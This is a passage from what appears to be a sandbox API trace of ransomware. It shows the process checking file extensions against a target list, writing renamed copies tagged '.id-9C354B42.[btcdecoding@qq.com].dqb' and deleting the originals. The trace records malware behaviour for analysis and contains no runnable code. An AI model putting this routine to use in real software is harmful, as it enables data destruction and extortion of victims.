returned -1 [0040.519] lstrlenW (lpString=".docx") returned 5 [0040.519] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0040.519] lstrlenW (lpString=".pdf") returned 4 [0040.520] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString=".xls") returned 4 [0040.520] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString=".xlsx") returned 5 [0040.520] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0040.520] lstrlenW (lpString=".ppt") returned 4 [0040.520] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString=".zip") returned 4 [0040.520] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString=".rar") returned 4 [0040.520] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString=".bz2") returned 4 [0040.520] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0040.520] lstrlenW (lpString=".7z") returned 3 [0040.520] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString=".dbf") returned 4 [0040.520] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString=".1cd") returned 4 [0040.520] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString=".jpg") returned 4 [0040.520] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.520] lstrlenW (lpString=".doc") returned 4 [0040.520] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0040.520] lstrlenW (lpString=".docx") returned 5 [0040.520] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0040.520] lstrlenW (lpString=".pdf") returned 4 [0040.520] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0040.520] lstrlenW (lpString=".xls") returned 4 [0040.521] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0040.521] lstrlenW (lpString=".xlsx") returned 5 [0040.521] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0040.521] lstrlenW (lpString=".ppt") returned 4 [0040.521] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0040.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.521] lstrlenW (lpString=".zip") returned 4 [0040.521] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0040.521] lstrlenW (lpString=".rar") returned 4 [0040.521] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0040.521] lstrlenW (lpString=".bz2") returned 4 [0040.521] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0040.521] lstrlenW (lpString=".7z") returned 3 [0040.521] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0040.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.521] lstrlenW (lpString=".dbf") returned 4 [0040.521] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0040.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.521] lstrlenW (lpString=".1cd") returned 4 [0040.521] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0040.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.521] lstrlenW (lpString=".jpg") returned 4 [0040.521] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0040.521] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.521] lstrlenW (lpString="DATES.XML") returned 9 [0040.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.522] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=8918) returned 1 [0040.522] CloseHandle (hObject=0x1f8) returned 1 [0040.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20 [0040.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.522] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.522] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.524] GetLastError () returned 0x0 [0040.524] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x22d6, lpOverlapped=0x0) returned 1 [0040.525] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0040.526] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.526] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.526] SetEndOfFile (hFile=0x1fc) returned 1 [0040.527] CloseHandle (hObject=0x1fc) returned 1 [0040.527] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.527] SetEndOfFile (hFile=0x1f8) returned 1 [0040.528] CloseHandle (hObject=0x1f8) returned 1 [0040.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.528] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0040.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.528] lstrlenW (lpString=".doc") returned 4 [0040.529] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".docx") returned 5 [0040.529] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0040.529] lstrlenW (lpString=".pdf") returned 4 [0040.529] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".xls") returned 4 [0040.529] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".xlsx") returned 5 [0040.529] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0040.529] lstrlenW (lpString=".ppt") returned 4 [0040.529] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString=".zip") returned 4 [0040.529] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.529] lstrlenW (lpString=".rar") returned 4 [0040.529] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".bz2") returned 4 [0040.529] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".7z") returned 3 [0040.529] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString=".dbf") returned 4 [0040.529] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString=".1cd") returned 4 [0040.529] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString=".jpg") returned 4 [0040.529] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.529] lstrlenW (lpString=".doc") returned 4 [0040.529] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.529] lstrlenW (lpString=".docx") returned 5 [0040.529] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0040.530] lstrlenW (lpString=".pdf") returned 4 [0040.530] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".xls") returned 4 [0040.530] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".xlsx") returned 5 [0040.530] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0040.530] lstrlenW (lpString=".ppt") returned 4 [0040.530] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.530] lstrlenW (lpString=".zip") returned 4 [0040.530] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.530] lstrlenW (lpString=".rar") returned 4 [0040.530] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".bz2") returned 4 [0040.530] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString=".7z") returned 3 [0040.530] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.530] lstrlenW (lpString=".dbf") returned 4 [0040.530] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.530] lstrlenW (lpString=".1cd") returned 4 [0040.530] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0040.530] lstrlenW (lpString=".jpg") returned 4 [0040.530] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.530] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.530] lstrlenW (lpString="PHONE.XML") returned 9 [0040.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.531] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1844) returned 1 [0040.531] CloseHandle (hObject=0x1f8) returned 1 [0040.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20 [0040.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.531] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.531] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.531] GetLastError () returned 0x0 [0040.531] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x734, lpOverlapped=0x0) returned 1 [0040.533] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x740, lpOverlapped=0x0) returned 1 [0040.534] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.534] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.534] SetEndOfFile (hFile=0x1fc) returned 1 [0040.534] CloseHandle (hObject=0x1fc) returned 1 [0040.534] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.535] SetEndOfFile (hFile=0x1f8) returned 1 [0040.535] CloseHandle (hObject=0x1f8) returned 1 [0040.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.535] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0040.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.536] lstrlenW (lpString=".doc") returned 4 [0040.536] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString=".docx") returned 5 [0040.536] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0040.536] lstrlenW (lpString=".pdf") returned 4 [0040.536] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString=".xls") returned 4 [0040.536] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString=".xlsx") returned 5 [0040.536] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0040.536] lstrlenW (lpString=".ppt") returned 4 [0040.536] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.536] lstrlenW (lpString=".zip") returned 4 [0040.536] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.536] lstrlenW (lpString=".rar") returned 4 [0040.536] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString=".bz2") returned 4 [0040.536] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.536] lstrlenW (lpString=".7z") returned 3 [0040.537] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString=".dbf") returned 4 [0040.537] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString=".1cd") returned 4 [0040.537] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString=".jpg") returned 4 [0040.537] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString=".doc") returned 4 [0040.537] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString=".docx") returned 5 [0040.537] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0040.537] lstrlenW (lpString=".pdf") returned 4 [0040.537] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString=".xls") returned 4 [0040.537] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString=".xlsx") returned 5 [0040.537] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0040.537] lstrlenW (lpString=".ppt") returned 4 [0040.537] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.537] lstrlenW (lpString=".zip") returned 4 [0040.537] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.537] lstrlenW (lpString=".rar") returned 4 [0040.537] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString=".bz2") returned 4 [0040.537] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.537] lstrlenW (lpString=".7z") returned 3 [0040.537] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.538] lstrlenW (lpString=".dbf") returned 4 [0040.538] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.538] lstrlenW (lpString=".1cd") returned 4 [0040.538] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.538] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0040.538] lstrlenW (lpString=".jpg") returned 4 [0040.538] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.538] lstrcmpiW (lpString1=".DAT", lpString2=".dqb") returned -1 [0040.538] lstrlenW (lpString="STOCKS.DAT") returned 10 [0040.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.254] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=39017) returned 1 [0041.254] CloseHandle (hObject=0x208) returned 1 [0041.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20 [0041.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.255] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.255] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.255] GetLastError () returned 0x0 [0041.255] ReadFile (in: hFile=0x208, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x9869, lpOverlapped=0x0) returned 1 [0041.257] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x9870, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0x208, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.259] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.259] SetEndOfFile (hFile=0x204) returned 1 [0041.259] CloseHandle (hObject=0x204) returned 1 [0041.260] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.260] SetEndOfFile (hFile=0x208) returned 1 [0041.261] CloseHandle (hObject=0x208) returned 1 [0041.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0041.261] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.261] lstrlenW (lpString=".doc") returned 4 [0041.261] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.261] lstrlenW 